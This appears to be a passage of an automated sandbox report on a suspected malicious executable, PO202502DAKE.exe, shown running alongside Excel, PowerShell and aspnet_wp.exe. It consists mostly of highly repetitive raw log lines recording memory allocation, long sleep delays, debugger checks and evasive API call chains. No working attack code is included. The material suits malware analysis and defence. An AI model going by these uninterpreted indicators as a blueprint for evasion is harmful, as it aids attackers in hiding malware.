                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD7F680 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,12_2_00007FFC9CD7F680
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory allocated: 23337E60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory allocated: 23337E80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 1FF1C940000 memory reserve | memory write watch
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 1FF1C960000 memory reserve | memory write watch
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 21BC0980000 memory reserve | memory write watch
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 21BC0AA0000 memory reserve | memory write watch
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4895Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4976Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeWindow / User API: threadDelayed 892Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeAPI coverage: 8.9 %
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeAPI coverage: 5.4 %
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1752Thread sleep count: 4895 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104Thread sleep count: 4976 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 7936Thread sleep count: 892 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 7936Thread sleep time: -892000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEF7210 SetLastError,FindFirstFileExW,GetLastError,12_2_00007FFC9CEF7210
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE47210 SetLastError,FindFirstFileExW,GetLastError,28_2_00007FFC9CE47210
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: PO202502DAKE.exe, 0000001C.00000002.1452181020.000001FF1C989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh~
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.drBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                          Source: PO202502DAKE.exe, 0000000C.00000002.1315626963.0000023337EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmm0.P
                          Source: aspnet_wp.exe, 00000010.00000002.6606722236.000001744C4F9000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000010.00000003.2005986751.000001744C4F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll``
                          Source: PO202502DAKE.exe, 00000021.00000002.1536495963.0000021BC0839000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002C078 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000000014002C078
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A8700 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,12_2_00007FF6220A8700
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A1180 Sleep,Sleep,SetUnhandledExceptionFilter,12_2_00007FF6220A1180
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD85F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFC9CD85F0C
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CFC52BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFC9CFC52BC
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002C078 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000000014002C078
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002FE18 SetUnhandledExceptionFilter,16_2_000000014002FE18
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002DE40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000000014002DE40
